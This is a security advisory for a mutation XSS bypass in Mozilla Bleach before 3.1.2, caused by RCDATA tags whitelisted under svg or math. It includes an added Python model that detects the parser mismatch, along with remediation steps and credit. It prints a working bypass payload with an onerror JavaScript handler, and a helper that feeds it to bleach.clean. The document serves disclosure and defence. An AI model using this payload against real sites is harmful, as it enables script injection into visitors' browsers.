Summary
Mutation XSS (mXSS) vulnerability in Mozilla Bleach when RCDATA tags and either the svg or the math tag are whitelisted and the keyword argument strip=False is used. The cause is improper sanitization of the RCDATA tags (script, noscript, style, noframes, xmp, noembed and iframe; html5lib's rcdataElements) when they are placed under svg or math. Bleach treats the content of these tags as text regardless of where they sit, so a tag that is not whitelisted but appears inside them is kept in the output rather than stripped (strip=False) and reaches the output unescaped, as the expected result below shows. A browser parsing that output does not treat style and the other RCDATA tags as raw-text elements when they are inside svg or math (foreign content): it parses their content as markup, so the text Bleach let through becomes live elements and event-handler attributes. The result is execution of arbitrary HTML and JavaScript in the victim's browser.
Product
Bleach before 3.1.2
Impact
According to GitHub, more than 72,000 repositories are dependent on Bleach. Among them are major vendors, including multiple Fortune 500 tech companies.
Steps to reproduce
import bleach
Expected result (output of the sanitizer; the payload is returned unchanged and, once rendered, the browser executes alert(1)):
<svg><style><img src=x onerror=alert(1)></style></svg>
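The following is an added model of the parser mismatch described in the summary; it is not Bleach's code and not part of the original advisory. Python's html.parser is used as a stand-in for the sanitizer side, because it switches to raw-text mode on every <style> or <script> start tag by name alone, which is the same assumption that lets the payload through. The browser side is a subclass that applies the HTML5 rule that inside <svg>/<math> those tags are ordinary elements whose children are parsed as markup. The differential check reports any tag the browser model materialises that the sanitizer model only ever saw as text. The reproduce_with_bleach helper is an assumption of this example: it uses the allow list ["svg", "style"] with strip=False, runs only if a bleach package is installed, and is expected to return the payload unchanged on versions before 3.1.2.

```python
"""Added model of the parser mismatch behind the mXSS described above.

Not bleach's code. Python's html.parser stands in for the sanitizer side:
like the RCDATA handling described in the summary, it treats the body of
<style>/<script> as raw text wherever the tag sits. The browser side is a
subclass that follows the HTML5 rule that, inside <svg>/<math> (foreign
content), those tags are ordinary elements whose children are markup.
"""
from html.parser import HTMLParser

# Constructed from the advisory's expected-result payload.
PAYLOAD = "<svg><style><img src=x onerror=alert(1)></style></svg>"

FOREIGN_CONTENT_ROOTS = {"svg", "math"}


class SanitizerModel(HTMLParser):
    """Records parse events. Raw-text mode for <style>/<script> is decided by
    tag name only, so markup inside them is reported as text, never as a tag."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.events = []

    def handle_starttag(self, tag, attrs):
        self.events.append(("start", tag, dict(attrs)))

    def handle_endtag(self, tag):
        self.events.append(("end", tag))

    def handle_data(self, data):
        if data:
            self.events.append(("text", data))


class BrowserModel(SanitizerModel):
    """Same recorder, but raw-text mode is suppressed while inside foreign
    content, as a browser does for <style> under <svg>/<math>. (A real browser
    also breaks out of the SVG on <img>; that detail is not needed here.)"""

    def __init__(self):
        super().__init__()
        self._foreign_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in FOREIGN_CONTENT_ROOTS:
            self._foreign_depth += 1
        super().handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in FOREIGN_CONTENT_ROOTS and self._foreign_depth:
            self._foreign_depth -= 1
        super().handle_endtag(tag)

    def set_cdata_mode(self, elem, *args, **kwargs):
        # HTMLParser calls this right after a <style>/<script> start tag;
        # skipping it inside foreign content keeps the parser in markup mode.
        if self._foreign_depth:
            return
        super().set_cdata_mode(elem, *args, **kwargs)


def parse_events(markup, model):
    parser = model()
    parser.feed(markup)
    parser.close()
    return parser.events


def start_tags(markup, model):
    """Tags the model reports as elements; only these ever reach an allow list."""
    return [event[1] for event in parse_events(markup, model) if event[0] == "start"]


def mutation_risk(markup):
    """Differential check: tags the browser model materialises that the
    sanitizer model only saw as text. Non-empty means the allow list was bypassed."""
    seen_by_sanitizer = set(start_tags(markup, SanitizerModel))
    return [tag for tag in start_tags(markup, BrowserModel) if tag not in seen_by_sanitizer]


def reproduce_with_bleach(markup=PAYLOAD):
    """Run the real sanitizer if bleach is installed (assumed allow list:
    svg plus the RCDATA tag style, strip=False as in the summary). Returns
    None when bleach is not importable."""
    try:
        import bleach
    except ImportError:
        return None
    return bleach.clean(markup, tags=["svg", "style"], strip=False)


if __name__ == "__main__":
    for model in (SanitizerModel, BrowserModel):
        print(model.__name__, parse_events(PAYLOAD, model))
    print("tags the sanitizer never judged:", mutation_risk(PAYLOAD))
    print("bleach.clean output:", reproduce_with_bleach())
```

The same payload with the <style> directly in HTML content (no svg or math ancestor) yields an empty mutation_risk list, because both models agree that the body of <style> is raw text there; that matches the advisory's condition that svg or math must be whitelisted for the bypass to work. Running the differential check over a sanitizer's own test corpus is a cheap way to catch this class of namespace-dependent mismatch before an upgrade is available.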
Remediation
Update the bleach dependency to 3.1.2 or later. Until the upgrade is in place, the trigger can be removed by breaking any one of the conditions in the summary: do not whitelist the RCDATA tags together with svg or math, or call bleach.clean with strip=True.
Credit
This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.